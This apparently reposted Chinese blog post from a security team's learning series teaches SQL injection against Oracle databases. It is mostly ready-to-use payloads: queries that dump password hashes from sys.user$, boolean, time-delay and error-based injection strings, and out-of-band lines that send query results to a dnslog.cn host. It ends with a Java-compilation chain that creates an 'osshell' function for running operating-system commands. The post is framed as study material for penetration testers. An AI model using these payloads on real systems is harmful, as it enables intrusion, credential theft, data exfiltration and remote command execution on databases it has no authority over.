oracle decode_Oracle 注入学习(终结版)

最新推荐文章于 2023-10-20 15:00:08 发布
最新推荐文章于 2023-10-20 15:00:08 发布
阅读量386 收藏
点赞数
文章标签: oracle decode oracle replace replace oracle

3ad98d9bd44c535ccca048d22e4679a1.png

Every body早上好鸭!

ChaMd5安全团队最勤劳小编上线啦!

66a244b85800215201c5e5c8270287e4.png
86abab4035ef1ecfa8b14782d1801d01.gifOracle 数据库学习

Oracle,是甲骨文公司的一款关系数据库管理系统。

User Process、Server Process、PGA可以看做成Clinet端,上面的实例(Instance)和下面的数据库(Database)及参数文件(parameter file)、密码文件(password file)和归档日志文件(archived logfiles)组成Oracle Server,所以整个示图可以理解成一个C/S架构。

Oracle Server由两个实体组成:

实例(instance)与数据库(database)

86abab4035ef1ecfa8b14782d1801d01.gif搭建 
https://github.com/ChaMd5Team/Pentest-tools/tree/master/Oracleinject

86abab4035ef1ecfa8b14782d1801d01.gif注入学习

oracle特性:

Oracle 使用查询语句获取数据时需要跟上表名,没有表的情况下可以使用dual,dual是Oracle的虚拟表,用来构成select的语法规则,Oracle保证dual里面永远只有一条记录

获取数据库版本:

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

e2bb1ccf74dbf3810bfd0288adff6f9c.png 
SELECT version FROM v$instance;

59cc813781e1a64dcc5b56707de496b5.png

获取操作系统版本:

SELECT banner FROM v$version where banner like 'TNS%';

ea1013b00bbd1d10d7b842b495fa4a86.png

获取当前数据库用户:

SELECT user FROM dual;

f27c37ab2d1038fe771b15409c16d1b2.png

获取当前用户权限:

SELECT * FROM session_privs;

8a563fb9d933b2155d83892f1d4e9661.png

获取所有数据库用户密码:

SELECT name, spare4 FROM sys.user$;

748c62e35d3e76cbdcec3150364cd791.png

列出DBA账户:

2d83cf14e4278970db02167aee452beb.png

获取DB文件路径:

SELECT name FROM V$DATAFILE;

8897313b468c6ce7234a0351a1d12067.png

基于函数的注入

Substr函数

select substr(user, 1, 1) from dual;

48b2ce1c84f986b37c5c4e2d4d696c02.png

Decode函数:

错误返回2

select decode(substr(user, 1, 1), '1', (1/1),2) from dual;

521d8f0b61c7c14c25f75d2e0e322752.png

正确返回1

select decode(substr(user, 1, 1), 'S', (1/1),2) from dual;

1928d8ac1d32ba834c69a7948cd2278f.png

Instr函数:

错误返回0

select instr((select user from dual),'admin') FROM dual;

f5095bc85ee07b28f87b4f32f99c8a95.png

正确返回1

select instr((select user from dual),'SYS') FROM dual;

54999beb081c9f21053a234f5333bc74.png

时间盲注:

语句一正确延时10秒左右返回1:

select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('olo', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

5143b1116d8dc778a9a932eda2e82e64.png

语句二正确延时10s左右返回1:

select decode(substr(user,1,1),'S',dbms_pipe.receive_message('olo',10),0) from dual;

338c785fee2f1009e2b9da05f9ea752f.png

语句三正确延时10s左右返回1:

select 1 from dual where 1=0 or DBMS_PIPE.RECEIVE_MESSAGE('pyy', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

6b248a239befc83b4bb5b276f928db6a.png

报错注入:

ctxsys.drithsx.sn()函数:

select ctxsys.drithsx.sn(1, (select user from dual)) from dual;

271e753b31121f7bd730abfbefc84ef6.png

ctxsys.ctx_report.token_type()函数:

select ctxsys.ctx_report.token_type((select user from dual), '1') from dual;

32223b9c178ced6b2daaeccf7be706cf.png

xmltype()函数:

select xmltype('<:'||(select user from dual)||'>') from dual;

3a931666b5bf7ec11f9bed8cd7443bd1.png

dbms_xdb_version.checkin()函数:

select dbms_xdb_version.checkin((select user from dual)) from dual;

7790cd1ac3eb77945040a5626d940d03.png

dbms_xdb_version.makeversioned()函数:

select dbms_xdb_version.makeversioned((select user from dual)) from dual;

969f616fe159c07d74a4c91b0a951166.png

dbms_xdb_version.uncheckout()函数:

select dbms_xdb_version.uncheckout((select user from dual)) from dual;

46f3ed0a0bfd50fb7c50f4e85f30b7f0.png

dbms_utility.sqlid_to_sqlhash()函数:

SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

b9d1db9b9021d46b555f350fc82e1d8f.png

ordsys.ord_dicom.getmappingxpath()函数:

select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;

b2e703211a0505dd20c07f05dcb3841a.png

utl_inaddr.get_host_name()函数:

select utl_inaddr.get_host_name((select user from dual)) from dual;

99fa5c738997f3ab5145fb862adf861b.png

utl_inaddr.get_host_address()函数:

select utl_inaddr.get_host_address('~'||(select user from dual)||'~') from dual;

017b8ace02ba35ab7d560336003fde75.png

带外通道(OOB:Out Of Band Channels):

使用一些除常规通道以外的替代的信道来请求服务器资源,一般使用 Oracle 发送HTTP或者DNS请求,将查询结果带到请求中,然后监测外网服务器的HTTP和DNS日志,从日志中获取 sql 语句查询的结果,通过这种方式将繁琐的盲注转换成可以直接简便的获取查询结果的方式,尤其是基于时间的盲注,能极大地加快速度

utl_http.request()函数:

SELECT UTL_HTTP.REQUEST((select user from dual)||'.xxxxx.dnslog.cn') FROM DUAL;

4d811470da206b20a88b9b2f90789998.png

ec1c772fefe236268feb39a23df59d4a.png

utl_inaddr.get_host_address()函数:(重新打马赛克)

select utl_inaddr.get_host_address((select user from dual)||'.xxxxxx.dnslog.cn') from dual;

e6ac14bfa55ba836b64bef824cc8225f.png

096581ef32f73da3b602be1f5a3d80fa.png

sys.dbms_ldap.init()函数:

select dbms_ldap.init('xxxxxx.dnslog.cn',80) from dual;

182c0d6e9dd4d7381bf7d352675ecd96.png

11eb05b14606408fb7d3feed2618146a.png

httpuritype()函数:

select httpuritype((select user from dual)||'.xxxxxx.dnslog.cn').getclob() from dual;

b316f968b5111ebbe52f661776309b17.png

beea4567e897529c39aa75f0f068ae9d.png

执行系统命令:

select null,null from dual union select 1,dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

f338dc773e779bc06838f51d9fe37120.png 
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;

91e4db41ee6b2f8069c0dc98ca7e9299.png 
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function osshell(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

f76641fae28bb6a8c82fe27edf08c52e.png

执行系统命令:

select osshell('whoami') from dual;

c1fbd9fa4b9b2b0439186fc2d6a98ee6.png

鸣谢

https://xz.aliyun.com/t/7897

end

ChaMd5 ctf组 长期招新

尤其是crypto+reverse+pwn+合约的大佬

欢迎联系admin@chamd5.org

227e2bb3bbbb489fce17e84f99c72d75.png
weixin_39733232
关注
oracle 布尔盲注,【原创】WEB安全第四章SQL注入oracle +jsp 布尔型decode注入
weixin_32616931的博客
04-03 658
WEB安全第四章SQL注入oracle +jsp 布尔型decode注入1、在oracle两种利用布尔型实现盲注入方法是否存在注入 根据页面的返回不同 从而判断注入点。出数据 通过注入点 构造的SQL语句 判断页面是否正常。2、decode注入decode(字段或字段的运算,值1,值2,值3)这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2...
81.网络安全渗透测试—[SQL注入篇20]—[Oracle+JSP-decode/BurpSuite布尔型盲注入]
qwsn
01-21 2797
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 布尔型盲注入 1、Oracle 布尔型盲注入方法:`2种` 2、盲注步骤:`2步` 3、盲注原理: 二、decode注入详解 1、decode()函数的语法 2、sign()函数的语法 3、decode()函数比较大小 4、substr()函数语法 5、chr()函数语法 6、ascii()函数语法 7、decode()函数注入姿势 8、以上可替换的SQL语句 三、不使用decode注入
DECODE函数
yuhui666666的博客
08-05 165
DECODE 相当于sql中的一个map函数,会新建一列把value值展现 SELECT T1.*,        T2.WAREKIND_NAME,        DECODE(T1.CURRENCY_TYPE, 'A', '111', 'B', '222') CURRENCY_NAME   FROM TB_CUS_TRADE_WARE T1, TB_BAS_BED_SRT T2  ...
urldecode()二次解码引发注入
qlxmy的博客
02-16 1万+
PHP中常用过滤函数如addslashes()、mysql_real_escape_string()、mysql_escape_string()或者使用魔术引号GPC开关来防止注入,原理都是给单引号(’)、双引号(”)、反斜杠(\)和NULL等特殊字符前面加上反斜杠来进行转义。         但是这些函数在遇到urldecode()函数时,就会因为二次解码引发注入。urldecode()函数是
oracle中自带的函数decode函数
lk_0518的博客
03-01 554
一.decode函数使用语法     DECODE(value, if1, then1, if2,then2, if3,then3, . . . else )   Value 代表某个表的任何类型的任意列或一个通过计算所得的任何结果。当每个value值被测试,如果value的值为if1,Decode 函数的结果是            then1;如果value等于if2,Decode函数结果是t...
oracle_function_decode.patch
09-15
博客:PostgreSQL的学习心得和知识总结(四十四)|语法级自上而下完美实现Oracle数据库DECODE函数的实现方案(GreenPlum & AntDB)
Oracledecode 函数用法
12-16
Oracle中的DECODE函数是一种非常实用的工具,它允许你在SQL查询中执行简单的条件判断和返回相应的值。这个函数类似于IF-THEN-ELSE语句的简写形式,减少了编写复杂逻辑的代码量,使得SQL语句更加简洁易读。 DECODE...
Oracle DECODE函数语法使用介绍
09-10
Oracle DECODE函数是一种在Oracle数据库中执行条件判断的实用函数,它允许你在SQL查询中实现类似于if-then-else的逻辑。DECODE函数的主要优点在于它简洁且高效,尤其是在处理大量数据时,能够减少不必要的计算和提高...
【PB续命02】Oracle中加密及编码
最新发布
REST2SQL ,JSON2WEB
10-20 1873
Oracle中实现Md5/Base64/Aes+Base64/UrlEncode等加密编码的使用备忘,参考其它人的贴子,Oracle 11g 亲测有效。
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1313
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
Oracle 注入bypass总结(艰难的心路历程)
weixin_42508548的博客
11-24 1893
文前先感谢大家的支持,上篇Oracle数据库注入总结想着后续学习一下如何进行利用,getshell的,奈何技术还太菜了,再加上项目压力大,所以就慢慢搁置了。这里先出一篇bypass的,文中仅针对Oracle数据库,但是bypass手法我认为万变不离其宗,思想上是通用的,希望能够对大家有所帮助。 0x01 环境准备 一、安装Oracle数据库 1、首先下载数据库安装软件 具体可以从参考这里,我是从他的百度云下载的Windows10下安装Oracle 11g_勿忘初心的博客-CSDN博客_win10安装o
oracle 读取ldap数据库,Oracle PL/SQL管理LDAP服务器(DBMS_LDAP包的使用)
weixin_42512159的博客
04-13 370
了解LDAPLDAP是Light Directory Access Protocol轻量级目录访问协议的简称,LDAP与数据库有很大的区别,它的数据是树状的,而且每个节点的属性也比较固定。LDAP协议中用dn表示一条记录的位置,dc表示一条记录所属区域,ou表示一条记录所属组织,cn表示一条记录的名称,uid表示一条记录的ID,其中dn是根据dc、ou、cn或uid的组合来表示的,对于某条记录dn...
oracle延时盲注如何防止,关于oracle延时型注入手工注入的思考
weixin_29250403的博客
04-07 546
平时遇到oracle注入的情况不是很多,今天遇到一处oracle注入的延时型注入,简单记录一下。测试和漏洞挖掘中,通过页面响应时间状态,通过这种方式判断SQL是否被执行的方式,便是延时性注入oracle延时性注入和其他的数据库不同,oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),也是通过sqlmap和网上师傅们的文章才知道的,当去手注的时候大脑一片空白,网上...
Oracle注入
秋水的博客
09-03 6513
Oracle数据库 Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 既然是关系数据库,肯定也是存在一些关系表,在Oracle数据库中,库的概念被淡化,强调用户 Oracle注入之联合查询 注入原理 其注入原理与MySQL一致,都是基于回显的注入,通过union all select来获取我们想要的数据 引入知识 dual表,此表是Oracle数...
oracle最强大函数之一decode函数的使用
热门推荐
weeknd的博客
05-04 16万+
decode的几种用法 1:使用decode判断字符串是否一样 DECODE(value,if1,then1,if2,then2,if3,then3,...,else) 含义为 IF 条件=值1 THEN     RETURN(value 1) ELSIF 条件=值2 THEN     RETURN(value 2)     ...... ELSIF 条件=值n THEN   
Oracle PL/SQL管理LDAP服务器(DBMS_LDAP包的使用)
gamestory的专栏
01-07 3804
了解LDAP LDAP是Light Directory Access Protocol轻量级目录访问协议的简称,LDAP与数据库有很大的区别,它的数据是树状的,而且每个节点的属性也比较固定。 LDAP协议中用dn表示一条记录的位置,dc表示一条记录所属区域,ou表示一条记录所属组织,cn表示一条记录的名称,uid表示一条记录的ID,其中dn是根据dc、ou、cn或uid的组合
Oracle注入之带外通信
weixin_30467087的博客
05-30 299
Oracle注入之带外通信和DNSLOG注入非常相似,例如和mysql中load_file()函数实现无回显注入非常相似。 下面介绍这个技术中常用的函数和使用。 环境这里准备两台测试,一台注入点的靶机,一台接受回显数据的平台。 接受的数据的靶机: nc -vvlp 2008 0x01utl_http.request()函数 通过utl_http.r...
oracle注入靶机,记录一次Oracle注入绕waf
weixin_29359765的博客
04-12 607
这个注入挺特殊的,是ip头注入。我们进行简单的探测:首先正常发起一次请求,我们发现content-type是76探测注入我习惯性的一个单引号:一个单引号我发现长度还是76我开始尝试单引号,双引号一起:我失败了长度还是76一般sql注入输入单引号一般长度都会有些变化。我记录深入探测,我输入'--%20返回了200,并且长度是0,这让我产生了一丝好奇。这里很有可能存在注入哦。我继续探测:输入--%20...
Oracle Decode函数详解与实战应用
"Oracledecode()函数的使用技巧与示例" Oracledecode()函数是一个非常实用的工具,尤其在处理数据查询和更新时,它能够简化复杂的逻辑判断,提高SQL语句的可读性和效率。这个函数允许你在SQL查询中直接进行条件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值